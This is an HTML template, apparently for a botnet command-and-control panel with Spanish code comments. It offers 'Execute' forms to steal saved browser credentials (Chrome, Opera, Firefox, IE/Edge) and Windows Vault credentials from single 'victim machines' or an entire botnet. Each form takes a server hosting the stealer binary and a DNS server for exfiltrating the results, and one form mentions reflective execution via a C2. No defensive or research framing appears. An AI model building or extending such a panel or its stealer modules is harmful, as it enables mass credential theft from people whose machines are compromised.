<app-menu></app-menu>
<h2>GET WEB CREDENTIALS BROWSER CHROME FROM VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to take file "MicrosoftChro" with WEB Credentials from Victim Machine.</p>
  <p>Link HTTP server where binary is("http://localhost")<input type="text" /></p>
  <p>DNS Server where upload the results file ("localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>GET WEB CREDENTIALS BROWSER CHROME FROM BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to take file "MicrosoftChro" with WEB Credentials from all Victim Machine.</p>
  <p>Link HTTP Server where binary is("http://localhost")<input type="text" /></p>
  <p>DNS Server where upload results file ("localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>GET WEB CREDENTIALS BROWSER CHROME OPERA FROM VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to take file "MicrosoftOps" with WEB Credentials from Victim Machine.</p>
  <p>Link HTTP Server where binary is("http://localhost")<input type="text" /></p>
  <p>DNS Server where upload results file ("localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>GET WEB CREDENTIALS BROWSER CHROME OPERA FROM BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to take file "MicrosoftOps" with WEB Credentials from all Victim Machines.</p>
  <p>Link HTTP Server where binary is("http://localhost")<input type="text" /></p>
  <p>DNS Server where upload results file ("localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>GET WEB CREDENTIALS BROWSER FIREFOX FROM VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to take file "WebFox" with WEB Credentials from Victim Machine.</p>
  <p>Link HTTP Server where binary is("http://localhost")<input type="text" /></p>
  <p>DNS Server where upload results file ("localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>GET WEB CREDENTIALS BROWSER FIREFOX FROM BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to take file "WebFox" with WEB Credentials from all Victim Machines.</p>
  <p>Link HTTP Server where binary is("http://localhost")<input type="text" /></p>
  <p>DNS Server where upload results file ("localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>GET WEB CREDENTIALS BROWSER IE/EDGE FROM VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">This module can be executed via reflection with ST C2. Enter parameters to take file "MicrosoftlEdg" with WEB Credentials from Victim Machine.</p>
  <p>Link HTTP Server where binary is("http://localhost")<input type="text" /></p>
  <p>DNS Server where upload results file ("localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>GET WEB CREDENTIALS BROWSER IE/EDGE FROM VICTIM BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameter to take file "MicrosoftlEdg" with WEB Credentials from all Victim Machines.</p>
  <p>Link HTTP Server where binary is("http://localhost")<input type="text" /></p>
  <p>DNS Server where upload results file ("localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>WINDOWS VAULT CREDENTIALS FROM VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to take WINDOWS VAULT credentials from Victim Macihne. Credentials will be uploaded in "MicrosoftVault".</p>
  <p>Link HTTP Server where binary is("http://localhost")<input type="text" /></p>
  <p>IP/DNS Server where upload the file ("localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>WINDOWS VAULT CREDENTIALS FROM BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to take WINDOWS VAULT credentials from Victim Macihne. Credentials will be uploaded in "MicrosoftVault".</p>
  <p>Link HTTP Server where binary is("http://localhost")<input type="text" /></p>
  <p>IP/DNS server where upload the file ("localhost")<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>
